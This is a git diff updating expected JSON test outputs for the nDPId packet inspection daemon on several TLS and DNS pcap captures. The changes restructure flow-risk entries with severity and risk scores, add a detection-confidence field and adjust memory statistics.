-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1587,"flow_avg_l4_payload_len":793,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 02404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946681200000,"pkt":"ERERERERIiIiIiIiCABFAAXc5PNAADUGLVnVx5X7CgAAAQG7emnv2LwfZGeGnVAQGJjDXgAAbTEUMBIGA1UEAwwLKi5zLW1zbi5jb20xFzAVBgNVBAMMDioubGl2ZS1pbnQubmV0MR8wHQYDVQQDDBYqLndpbmRvd3NwaG9uZS1pbnQuY29tMRswGQYDVQQDDBIqLndpbmRvd3NwaG9uZS5jb20xKjAoBgNVBAMMISoucGFydG5lci1wYy53aW5kb3dzcGhvbmUtaW50LmNvbTEfMB0GA1UEAwwWKi5tYW5hZ2UubWljcm9zb2Z0LmNvbTEYMBYGA1UEAwwPKi52by5tc2VjbmQubmV0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuX3PkoiInBfw68+6JNH406C4alrEnikcq1FZEZJZj8A0h7uDLWO01R+9CYljtZsYv4E+pfWvi8Z31QoN\/mqJYHgutax6\/UWMDIxFsXaIn1iXAoBA481Pyqa8XbzdmibAvotkEOm0ksJYJlu7VrGuQP+fyz69HW2nTnewmEyTsEy9pTZjqsxFdtBcWm2sS5KQA3Hoj6NzWl54VkXacUcpgQraZZFiSKVJpxhZpAqND3x7NCgSdQvwN2uTFwRCsRagxmCSSaZkQSbYCDh7lvCo6r5wBODibkMqCxrJ4nyg5Uw+J74SsSHhtBMkb6YMlWe5gPOyYSZfIVCby4onZWx45wIDAQABo4IGXzCCBlswDAYDVR0TAQH\/BAIwADALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMIIDowYDVR0RBIIDmjCCA5aCDyoudm8ubXNlY25kLm5ldIIVKi5vZmZpY2VhcHBzLmxpdmUuY29tggsqLm1zYWRzLm5ldIIQKi5hZHMyLm1zYWRzLm5ldIIPKi5zdGMucy1tc24uY29tgiRjZG4uZGMyZmlsZXMuKi5saXZlZmlsZXN0b3JlLWludC5jb22CF2Nkbi4qLmxpdmVmaWxlc3RvcmUuY29tgh8qLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUuY29tgiMqLm1hcmtldHBsYWNlLndpbmRvd3Ntb2JpbGUtaW50LmNvbYIkKi5tYXJrZXRwbGFjZS53aW5kb3dzbW9iaWxlLXBlcmYuY29tgg8qLnN0ai5zLW1zbi5jb22CEmFqYXgubWljcm9zb2Z0LmNvbYIbKi5taWNyb3NvZnQtc2JzLWRvbWFpbnMuY29tggoqLmxpdmUubmV0ggkqLm1zbi5jb22CDSoubXNuLWludC5jb22CGiouZjFkcy5zaGFyZWQubGl2ZS1pbnQuY29tghQqLmYxZHMud2x4cnMtaW50LmNvbYIVKi5zaGFyZWQubGl2ZS1pbnQuY29tghEqLnNoYXJlZC5saXZlLmNvbYIPKi5taWNyb3NvZnQuY29tggoqLmxpdmUuY29tgg4qLmxpdmUtaW50LmNvbYILKi53bHhycy5jb22CDyoud2x4cnMtaW50LmNvbYIOKi5zdC5zLW1zbi5jb22CDyouc3RiLnMtbXNuLmNvbYIgaW1hZ2VzLm1veHkud2luZG93c3Bob25lLWludC5jb22CECoud2x4cnN1LWludC5jb22CI2ltYWdlcy5wYXJ0bmVyLndpbmRvd3NwaG9uZS1pbnQuY29tgh9pbWFnZXMucGFydG5lci53aW5kb3dzcGhvbmUuY29tggwqLmpwLm1zbi5jb22CEiouYzNzY3MuanAubXNuLmNvbYIPKi5hc3BuZXRjZG4uY29tgg0qLmhvdG1haWwuY29tgiEqLnBhcnRuZXItZGYud2luZG93c3Bob25lLWludC5jb22CCyoucy1tc24uY29tgg4qLmxpdmUtaW50Lm5ldIIWKi53aW5kb3dzcGhvbmUtaW50LmNvbYISKi53aW5kb3dzcGhvbmUuY29tgiEqLnBhcnRuZXI="}
-03063{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher","9":"TLS Expired Certificate"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}}
-00764{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher","9":"TLS Expired Certificate"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}}
+03330{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"ads1.msads.net","server_names":"*.vo.msecnd.net,*.officeapps.live.com,*.msads.net,*.ads2.msads.net,*.stc.s-msn.com,cdn.dc2files.*.livefilestore-int.com,cdn.*.livefilestore.com,*.marketplace.windowsmobile.com,*.marketplace.windowsmobile-int.com,*.marketplace.windowsmobile-perf.com,*.stj.s-msn.com,ajax.microsoft.com,*.microsoft-sbs-domains.com,*.live.net,*.msn.com,*.msn-int.com,*.f1ds.shared.live-int.com,*.f1ds.wlxrs-int.com,*.shared.live-int.com,*.shared.live.com,*.microsoft.com,*.live.com,*.live-int.com,*.wlxrs.com,*.wlxrs-int.com,*.st.s-msn.com,*.stb.s-msn.com,images.moxy.windowsphone-int.com,*.wlxrsu-int.com,images.partner.windowsphone-int.com,images.partner.windowsphone.com,*.jp.msn.com,*.c3scs.jp.msn.com,*.aspnetcdn.com,*.hotmail.com,*.partner-df.windowsphone-int.com,*.s-msn.com,*.live-int.net,*.windowsphone-int.com,*.windowsphone.com,*.partner-pc.windowsphone-int.com,*.manage.microsoft.com","ja3":"2201d8e006f8f005a6b415f61e677532","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=Microsoft Secure Server Authority","subjectDN":"C=US, L=Redmond, O=Microsoft, OU=GFS, CN=*.officeapps.live.com, CN=*.msads.net, CN=*.ads2.msads.net, CN=*.stc.s-msn.com, CN=cdn.dc2files.*.livefilestore-int.com, CN=cdn.*.livefilestore.com, CN=*.marketplace.windowsmobile.com, CN=*.marketplace.windowsmobile-int.com, CN=*.marketplace.windowsmobile-perf.com, CN=*.stj.s-msn.com, CN=ajax.microsoft.com, CN=*.microsoft-sbs-domains.com, CN=*.live.net, CN=*.msn.com, CN=*.msn-int.com, CN=*.f1ds.shared.live-int.com, CN=*.f1ds.wlxrs-int.com, CN=*.shared.live-int.com, CN=*.shared.live.com, CN=*.microsoft.com, CN=*.live.com, CN=*.live-int.com, CN=*.wlxrs.com, CN=*.wlxrs-int.com, CN=*.st.s-msn.com, CN=*.stb.s-msn.com, CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}}
+01031{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6/6
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4636670 bytes
-~~ total memory freed........: 4636670 bytes
-~~ total allocations/frees...: 99608/99608
+~~ total memory allocated....: 4721623 bytes
+~~ total memory freed........: 4721623 bytes
+~~ total allocations/frees...: 101198/101198
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 3068 chars
-~~ json string avg len.......: 1634 chars
+~~ json string max len.......: 3335 chars
+~~ json string avg len.......: 1751 chars
diff --git a/test/results/tls_alert.pcap.out b/test/results/tls_alert.pcap.out
index 5783dfa39..8aa5f6329 100644
--- a/test/results/tls_alert.pcap.out
+++ b/test/results/tls_alert.pcap.out
@@ -3,7 +3,7 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"}
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01031{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1628259176206,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597242 bytes
-~~ total memory freed........: 4597242 bytes
-~~ total allocations/frees...: 99566/99566
+~~ total memory allocated....: 4682195 bytes
+~~ total memory freed........: 4682195 bytes
+~~ total allocations/frees...: 101156/101156
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 931 chars
-~~ json string avg len.......: 592 chars
+~~ json string max len.......: 1036 chars
+~~ json string avg len.......: 638 chars
diff --git a/test/results/tls_certificate_too_long.pcap.out b/test/results/tls_certificate_too_long.pcap.out
index 4482ca5b6..9a06869a8 100644
--- a/test/results/tls_certificate_too_long.pcap.out
+++ b/test/results/tls_certificate_too_long.pcap.out
@@ -8,107 +8,107 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626168075664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1626168075664,"pkt":"WNVuaKQA8BiYFWV8CABFAABI5dsAAEARwpjAqAF5CAgICMwbADUANLpX5f8BAAABAAAAAAAAAzEyMQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1626168075665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABHYLwAAEARR7nAqAF5CAgICMwbADUAM5mdqksBAAABAAAAAAAAAjYwAjIxAzE0OQI1Mgdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1626168075665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJLIAAEARg8LAqAF5CAgICMwbADUANFbmSGkBAAABAAAAAAAAAzEzOQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="}
